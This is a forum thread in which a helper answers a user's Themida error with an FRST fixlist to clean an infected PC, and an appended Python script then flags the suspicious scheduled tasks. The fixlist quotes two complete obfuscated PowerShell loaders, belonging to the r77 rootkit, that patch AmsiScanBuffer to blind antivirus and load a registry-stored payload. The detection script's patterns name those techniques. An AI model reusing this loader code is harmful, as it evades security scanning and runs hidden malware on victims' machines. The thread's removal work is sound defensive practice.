Elektroda.pl
Themida error: file corrupted this program has been manipulated

Artur1233212 25 Sep 2021 12:13 213 1
  • #1
    Artur1233212
    Level 1  
    Hello, when I try to launch the application, I get this error: themida file corrupted this program has been manipulated and maybe it`s infected by a Virus or cracked. This file won`t work anymore. I have no idea what this is about, because this is the first time something like this has come up; previously, when I wanted to launch the application, nothing like this appeared. I am also attaching the FRST and Addition files, because apparently they are needed.
  • Helpful post
    #2
    Kolobos
    IT specialist
    All you need to do is not infect the computer and not install malicious applications.

    Did you install Radmin yourself?

    Uninstall:
    ByteFence Anti-Malware
    CCleaner

    Run a scan with mbam and adwcleaner and remove whatever they detect.

    Run this Fixlist.txt for FRST:
    CloseProcesses:
    Hosts:
    () [Brak podpisu cyfrowego] C:\Users\Oskar\AppData\Roaming\windows apps.exe
    (Byte Technologies LLC -> Byte Technologies LLC.) C:\Program Files\ByteFence\rtop\bin\rtop_bg.exe
    (Byte Technologies LLC -> Byte Technologies LLC.) C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706344 2021-06-09] (Oracle America, Inc. -> Oracle Corporation)
    HKU\S-1-5-21-2221780783-3129317606-1514258807-1001\...\Run: [Opera GX Browser Assistant] => C:\Users\Oskar\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe [3291288 2021-02-01] (Opera Software AS -> Opera Software)
    HKU\S-1-5-21-2221780783-3129317606-1514258807-1001\...\Run: [MP Launcher] => "D:\Games\scoped_dir10520_1000973119\MP Launcher.exe" /autostart
    HKU\S-1-5-21-2221780783-3129317606-1514258807-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [35093120 2021-09-10] (Piriform Software Ltd -> Piriform Software Ltd)
    HKLM\SOFTWARE\Policies\Mozilla\Firefox: Ograniczenia <==== UWAGA
    C:\Users\Oskar\AppData\Roaming\windows apps.exe
    Task: {48376B2C-EAA4-4F21-93CF-B3F830EA2375} - System32\Tasks\windows apps => C:\Users\Oskar\AppData\Roaming\windows apps.exe [369664 2021-08-15] () [Brak podpisu cyfrowego] <==== UWAGA
    Task: {7A1310F6-CB95-4D89-A06E-B43FA9DC0C82} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1614787015 => C:\Users\Oskar\AppData\Local\Programs\Opera GX\launcher.exe [3845328 2021-09-23] (Opera Software AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Oskar\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
    Task: {B04A4054-87B0-4B46-B5F5-5AD92738DB34} - System32\Tasks\$77svc64 => powershell "function Local:KyFNFEsxSJrE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EtMHXGJnFMocsg,[Parameter(Position=1)][Type]$AhNtnsKOFs)$ffPJKIloZoB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$ffPJKIloZoB.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$EtMHXGJnFMocsg).SetImplementationFlags('Runtime,Managed');$ffPJKIloZoB.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$AhNtnsKOFs,$EtMHXGJnFMocsg).SetImplementationFlags('Runtime,Managed');Write-Output $ffPJKIloZoB.CreateType();}$crvljpmgbbpOV=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$mfqIfpPOOrGncE=$crvljpmgbbpOV.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WCDQGArWgFMPYHZmYcg=KyFNFEsxSJrE @([String])([IntPtr]);$YROCqDmgUlnUKXhslMnCDp=KyFNFEsxSJrE 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aJubzHSIege=$crvljpmgbbpOV.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$QWDxtBhiHPhDWr=$mfqIfpPOOrGncE.Invoke($Null,@([Object]$aJubzHSIege,[Object]('Load'+'LibraryA')));$OxkDxfRxoRiktrFds=$mfqIfpPOOrGncE.Invoke($Null,@([Object]$aJubzHSIege,[Object]('Vir'+'tual'+'Pro'+'tect')));$qVuIDTX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QWDxtBhiHPhDWr,$WCDQGArWgFMPYHZmYcg).Invoke('a'+'m'+'si.dll');$hsEaGXLVIoYJzzXye=$mfqIfpPOOrGncE.Invoke($Null,@([Object]$qVuIDTX,[Object]('Ams'+'iSc'+'an'+'Buffer')));$KWvxfJCuoy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OxkDxfRxoRiktrFds,$YROCqDmgUlnUKXhslMnCDp).Invoke($hsEaGXLVIoYJzzXye,[uint32]8,4,[ref]$KWvxfJCuoy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hsEaGXLVIoYJzzXye,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OxkDxfRxoRiktrFds,$YROCqDmgUlnUKXhslMnCDp).Invoke($hsEaGXLVIoYJzzXye,[uint32]8,0x20,[ref]$KWvxfJCuoy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
    C:\Users\Oskar\AppData\Roaming\handlerun.exe
    Task: {BCB9CD32-88C3-4D20-B7F4-01508839FE35} - System32\Tasks\OneDrive Application Manifest => C:\Users\Oskar\AppData\Roaming\handlerun.exe [45568 2021-09-07] () [Brak podpisu cyfrowego] <==== UWAGA
    Task: {BE205392-30E1-42FD-A744-BF2692DAAFBD} - System32\Tasks\$77svc32 => powershell "function Local:wVgCZJvwjKUp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LILLfAcByIHBqw,[Parameter(Position=1)][Type]$cYrVsogYZO)$CmGBXzZlUYx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$CmGBXzZlUYx.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$LILLfAcByIHBqw).SetImplementationFlags('Runtime,Managed');$CmGBXzZlUYx.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$cYrVsogYZO,$LILLfAcByIHBqw).SetImplementationFlags('Runtime,Managed');Write-Output $CmGBXzZlUYx.CreateType();}$torNIkrKvJFxz=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$cEXsezwxAGqiet=$torNIkrKvJFxz.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$rMYqFdurgEpzxTvzrFR=wVgCZJvwjKUp @([String])([IntPtr]);$yGhYTzIOouUhUBxAwmXkxx=wVgCZJvwjKUp 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GfupWKNbEfG=$torNIkrKvJFxz.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$uQIKMUerQjYOGr=$cEXsezwxAGqiet.Invoke($Null,@([Object]$GfupWKNbEfG,[Object]('Load'+'LibraryA')));$MMteNQDzMZKzbjuha=$cEXsezwxAGqiet.Invoke($Null,@([Object]$GfupWKNbEfG,[Object]('Vir'+'tual'+'Pro'+'tect')));$OtsrHof=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uQIKMUerQjYOGr,$rMYqFdurgEpzxTvzrFR).Invoke('a'+'m'+'si.dll');$WDzvJVnOMohxsNTpd=$cEXsezwxAGqiet.Invoke($Null,@([Object]$OtsrHof,[Object]('Ams'+'iSc'+'an'+'Buffer')));$SfthMOtBqH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MMteNQDzMZKzbjuha,$yGhYTzIOouUhUBxAwmXkxx).Invoke($WDzvJVnOMohxsNTpd,[uint32]8,4,[ref]$SfthMOtBqH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$WDzvJVnOMohxsNTpd,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MMteNQDzMZKzbjuha,$yGhYTzIOouUhUBxAwmXkxx).Invoke($WDzvJVnOMohxsNTpd,[uint32]8,0x20,[ref]$SfthMOtBqH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
    Task: {F1908776-0FE8-4F17-9F0E-C1E56F6EF1A3} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [684976 2021-09-10] (Piriform Software Ltd -> Piriform)
    Task: {F5BF4A22-905F-49AD-B58A-DDD99F1745C1} - System32\Tasks\www2 => C:\WINDOWS\system32\registryapp.exe
    C:\WINDOWS\system32\registryapp.exe
    Task: {FD2ACA18-7A1E-4C70-9782-8E970EAF23C8} - System32\Tasks\Opera GX scheduled Autoupdate 1582903675 => C:\Users\Oskar\AppData\Local\Programs\Opera GX\launcher.exe [3845328 2021-09-23] (Opera Software AS -> Opera Software)
    Edge HomeButtonPage: HKU\S-1-5-21-2221780783-3129317606-1514258807-1001 -> hxxp://www.global-pl.com/
    Edge HomePage: Default -> hxxp://www.global-pl.com/
    Edge StartupUrls: Default -> "hxxp://www.global-pl.com/"
    Edge DefaultSearchURL: Default -> hxxp://www.global-pl.com/search?q={searchTerms}
    Edge DefaultSearchKeyword: Default -> global-pl.com
    CHR HomePage: Default -> hxxp://www.global-pl.com/
    CHR StartupUrls: Default -> "hxxp://www.global-pl.com/"
    CHR DefaultSearchURL: Default -> hxxps://pl.search.yahoo.com/search?fr=mcafee_uninternational&type=E210PL91105G0&p={searchTerms}
    CHR DefaultSearchKeyword: Default -> mcafee
    C:\Users\Oskar\AppData\Local\Google\Chrome\User Data\Default\Extensions\blngdeeenccpfjbkolalandfmiinhkak
    C:\Users\Oskar\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho
    CHR Extension: (ByteFence Secure Browsing) - C:\Users\Oskar\AppData\Local\Google\Chrome\User Data\Default\Extensions\blngdeeenccpfjbkolalandfmiinhkak [2020-05-07]
    CHR Extension: (McAfee® WebAdvisor) - C:\Users\Oskar\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2021-05-27]
    R2 rtop; c:\program files\bytefence\rtop\bin\rtop_svc.exe [297288 2020-03-27] (Byte Technologies LLC -> Byte Technologies LLC.) <==== UWAGA
    S2 McAfee WebAdvisor; "C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe" [X]
    S3 OverwolfUpdater; "D:\Games\Overwolf\OverwolfUpdater.exe" /RunningFrom SCM [X]
    S3 Rockstar Service; "D:\steam\Launcher\RockstarService.exe" [X]
    c:\program files\bytefence\
    2021-09-25 02:51 - 2021-09-25 02:51 - 000003936 _____ C:\WINDOWS\system32\Tasks\CCleaner Update
    2021-09-25 02:51 - 2021-09-25 02:51 - 000000863 _____ C:\Users\Public\Desktop\CCleaner.lnk
    2021-09-25 02:51 - 2021-09-25 02:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
    2021-09-25 02:51 - 2021-09-25 02:51 - 000000000 ____D C:\Program Files\CCleaner
    2021-09-07 20:27 - 2021-09-07 20:27 - 000045568 _____ C:\Users\Oskar\AppData\Roaming\handlerun.exe
    2021-09-07 20:27 - 2021-09-07 20:27 - 000007168 _____ () C:\Users\Oskar\AppData\Roaming\handler.exe
    2021-09-07 20:27 - 2021-09-07 20:27 - 000003024 _____ C:\WINDOWS\system32\Tasks\OneDrive Application Manifest
    2021-08-27 02:51 - 2021-09-08 02:07 - 000318464 _____ C:\Users\Oskar\AppData\Roaming\Install.exe
    2021-08-27 02:51 - 2021-09-08 02:07 - 000296960 _____ (bytecode77) C:\Users\Oskar\AppData\Roaming\BytecodeApi.dll
    2021-08-27 02:51 - 2021-09-08 02:07 - 000140288 _____ C:\Users\Oskar\AppData\Roaming\r77-x64.dll
    2021-08-27 02:51 - 2021-09-08 02:07 - 000112640 _____ C:\Users\Oskar\AppData\Roaming\r77-x86.dll
    2021-08-27 02:51 - 2021-09-08 02:07 - 000077312 _____ (bytecode77) C:\Users\Oskar\AppData\Roaming\BytecodeApi.UI.dll
    2021-08-27 02:51 - 2021-09-07 20:27 - 008276480 _____ C:\Users\Oskar\AppData\Roaming\localapp.exe
    2021-08-27 02:51 - 2021-08-27 02:51 - 000046080 _____ C:\Users\Oskar\AppData\Roaming\registryapp.exe
    2021-08-27 02:51 - 2021-08-27 02:51 - 000003290 _____ C:\WINDOWS\system32\Tasks\www2
    2021-06-06 02:59 - 2021-07-08 08:22 - 000000032 _____ () C:\Users\Oskar\AppData\Roaming\.machineId
    2021-08-27 02:51 - 2021-09-08 02:07 - 000296960 _____ (bytecode77) C:\Users\Oskar\AppData\Roaming\BytecodeApi.dll
    2021-08-27 02:51 - 2021-09-08 02:07 - 000077312 _____ (bytecode77) C:\Users\Oskar\AppData\Roaming\BytecodeApi.UI.dll
    2021-09-07 20:27 - 2021-09-07 20:27 - 000007168 _____ () C:\Users\Oskar\AppData\Roaming\handler.exe
    2021-09-07 20:27 - 2021-09-07 20:27 - 000045568 _____ () C:\Users\Oskar\AppData\Roaming\handlerun.exe
    2021-08-27 02:51 - 2021-09-08 02:07 - 000318464 _____ () C:\Users\Oskar\AppData\Roaming\Install.exe
    2021-08-27 02:51 - 2021-09-07 20:27 - 008276480 _____ () C:\Users\Oskar\AppData\Roaming\localapp.exe
    2021-09-07 20:27 - 2021-09-08 02:07 - 000002920 _____ () C:\Users\Oskar\AppData\Roaming\OneDrive.xml
    2021-08-27 02:51 - 2021-09-08 02:07 - 000140288 _____ () C:\Users\Oskar\AppData\Roaming\r77-x64.dll
    2021-08-27 02:51 - 2021-09-08 02:07 - 000112640 _____ () C:\Users\Oskar\AppData\Roaming\r77-x86.dll
    2021-08-27 02:51 - 2021-08-27 02:51 - 000046080 _____ () C:\Users\Oskar\AppData\Roaming\registryapp.exe
    2021-08-15 19:31 - 2021-08-15 19:31 - 000046080 _____ () C:\Users\Oskar\AppData\Roaming\shifter.exe
    2019-09-15 15:07 - 2020-06-20 00:16 - 000000039 _____ () C:\Users\Oskar\AppData\Roaming\WB.CFG
    2021-08-15 19:31 - 2021-08-15 19:31 - 000369664 _____ () C:\Users\Oskar\AppData\Roaming\windows apps.exe
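
A triage sketch for the `Task:` lines of a FRST log such as the one this fixlist was built from; it is an added example, not part of the original thread and not FRST's own logic. The heuristics (the `$77` task-name prefix, inline PowerShell that names `AmsiScanBuffer` or calls `[Reflection.Assembly]::Load`, unsigned files under `AppData\Roaming`) are taken from entries in the fixlist above; the sample lines are constructed and the function names are hypothetical.

```python
import re

# FRST "Task:" line: GUID, task path under System32\Tasks, then the action.
TASK_RE = re.compile(
    r"^Task: \{(?P<guid>[0-9A-Fa-f-]{36})\} - System32\\Tasks\\(?P<name>.+?) => (?P<action>.+)$"
)
# Marker printed for files without a digital signature (Polish FRST output, as on this page).
UNSIGNED_MARK = "[Brak podpisu cyfrowego]"

def normalize(action):
    """Undo 'Ams'+'iSc' style string splitting so keywords can be matched."""
    return re.sub(r"'\s*\+\s*'", "", action)

def triage_task(line):
    """Return (task_name, [reasons]) for one FRST Task line, or None if it is not one."""
    m = TASK_RE.match(line.strip())
    if not m:
        return None
    name, action = m.group("name"), m.group("action")
    flat = normalize(action).lower()
    checks = [
        (name.startswith("$77"), "task name uses the $77 prefix"),
        (flat.startswith("powershell"), "action is an inline PowerShell command"),
        ("amsiscanbuffer" in flat, "command names AmsiScanBuffer"),
        ("reflection.assembly]::load" in flat, "command calls [Reflection.Assembly]::Load"),
        ("\\appdata\\roaming\\" in flat and UNSIGNED_MARK.lower() in flat,
         "unsigned file under AppData\\Roaming"),
    ]
    return name, [why for hit, why in checks if hit]

def triage(lines):
    """Map task name -> reasons for every Task line with at least one finding."""
    results = (triage_task(line) for line in lines)
    return {name: why for name, why in filter(None, results) if why}

# Constructed sample lines (shortened, not copied from the log on this page).
SAMPLE = r"""
Task: {11111111-1111-1111-1111-111111111111} - System32\Tasks\$77svc64 => powershell "$f='Ams'+'iSc'+'an'+'Buffer';[Reflection.Assembly]::Load($bytes)"
Task: {22222222-2222-2222-2222-222222222222} - System32\Tasks\Example Manifest => C:\Users\user\AppData\Roaming\example.exe [45568 2021-09-07] () [Brak podpisu cyfrowego] <==== UWAGA
Task: {33333333-3333-3333-3333-333333333333} - System32\Tasks\Vendor Update => C:\Program Files\Vendor\update.exe [684976 2021-09-10] (Vendor Ltd -> Vendor)
""".strip().splitlines()

if __name__ == "__main__":
    for task, reasons in triage(SAMPLE).items():
        print(task, "->", "; ".join(reasons))
```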